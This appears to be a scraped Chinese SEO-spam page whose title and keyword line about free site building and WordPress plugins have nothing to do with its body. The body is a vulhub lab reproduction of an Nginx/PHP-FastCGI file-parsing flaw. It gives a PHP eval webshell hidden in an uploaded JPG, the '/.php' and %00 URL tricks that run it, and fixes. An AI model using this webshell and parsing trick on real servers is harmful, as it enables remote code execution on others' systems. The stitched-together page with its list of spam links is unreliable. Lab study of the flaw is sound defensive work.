当前位置: 首页 > news >正文

免费网站怎么建wordpress手机端主题插件下载失败

免费网站怎么建,wordpress手机端主题插件下载失败,奉贤网站建设网站制作,汕头新闻一、漏洞说明 Nginx文件解析漏洞算是一个比较经典的漏洞&#xff0c;接下来我们就通过如下步骤进行漏洞复现&#xff0c;以及进行漏洞的修复。 版本条件&#xff1a;IIS 7.0/IIS 7.5/ Nginx <8.03 二、搭建环境 cd /vulhub/nginx/nginx_parsing_vulnerability docker-compos…

一、漏洞说明
Nginx文件解析漏洞算是一个比较经典的漏洞,接下来我们就通过如下步骤进行漏洞复现,以及进行漏洞的修复。
版本条件:IIS 7.0/IIS 7.5/ Nginx <8.03
二、搭建环境
cd /vulhub/nginx/nginx_parsing_vulnerability
docker-compose up -d
在这里插入图片描述在这里插入图片描述

三、漏洞特征
访问:http://192.168.25.128/uploadfiles/nginx.png
在这里插入图片描述

然后我们输入/.php,可以发现并没有出现文件为找到,而是出现了php的配置信息
在这里插入图片描述

四、漏洞复现
使用界面的上传功能上传一个jpg图片马,jpg内容是@eval($_POST[“fname”]);
在这里插入图片描述

点击上传后
在这里插入图片描述

然后访问:
http://192.168.25.128/uploadfiles/b82ae21729b331095eb02a213284320d.jpg/.php
在这里插入图片描述

五、修复建议
1.php.ini配置文件中的cgi.fix_pathinfo=1设置为0
2.security.limit_extensions=./php
六、Nginx <8.03 空字节代码执行漏洞
影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
当使用PHP-FastCGI执行PHP时,遇到url里面存在%00空字节时与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,通过访问url+%00.PHP来执行其中的PHP代码。
例如:"http://127.0.0.1/1.jpg%00.php"会把1.jpg文件(木马文件)当做PHP文件来执行。xxx.jpg%00.php

http://www.yayakq.cn/news/363224/

相关文章:

  • 罗湖网站建设哪家好怎么做贷款网站
  • 网站导航页面模板网站收录提交接口
  • 中国搜索网站提交入口企业建网站好
  • 网站建设判断题wordpress tag函数
  • 傻瓜式网站建设软件电商分销
  • 广州商旅网站制作定制女仆
  • 聚名网站北京兼职做网站建设
  • 个人网站有必要备案吗seo快速排名百度首页
  • 如何创建一个网站0元郑州小程序开发制作
  • 泰州专业网站建设公司以下哪些不属于h5制作软件
  • 泉州住房和城乡建设网站西安机械加工网
  • 实验仪器销信应做何网站亚马逊跨境电商个人开店流程
  • 电商网站怎样做网站设计制作过程
  • 自学做网站要多久深圳专业网络推广
  • 软件行业有哪些岗位网站关键词优化到首页难度
  • 淄博网站制作设计龙岩做网站哪家好
  • 昆明网络公司网站企业自助网站建设
  • 藁城手机网站建设凡科网站建站教程
  • led企业网站策划施工企业主要负责人包括哪些
  • 中国农村建设投资有限公司网站除了wordpress还有什么可以建站
  • 网站建设备案计划书wordpress 汉化 插件
  • 网站开发成本核算及账务处理.net做的学校网站
  • 网站开发用的开源系统做网站电话说辞
  • 志丹网站建设平面广告图片
  • 企业网站宣传册应该哪个部门做wordpress persona
  • 已有域名怎么做网站学校网站建设调查问卷
  • 常州建设局网站seo外包公司费用
  • 网站模板 安全吗做品牌断码的网站
  • 大的网站建设公司四川省建设人才网
  • 盐城大丰建设局网站爱客crm多少钱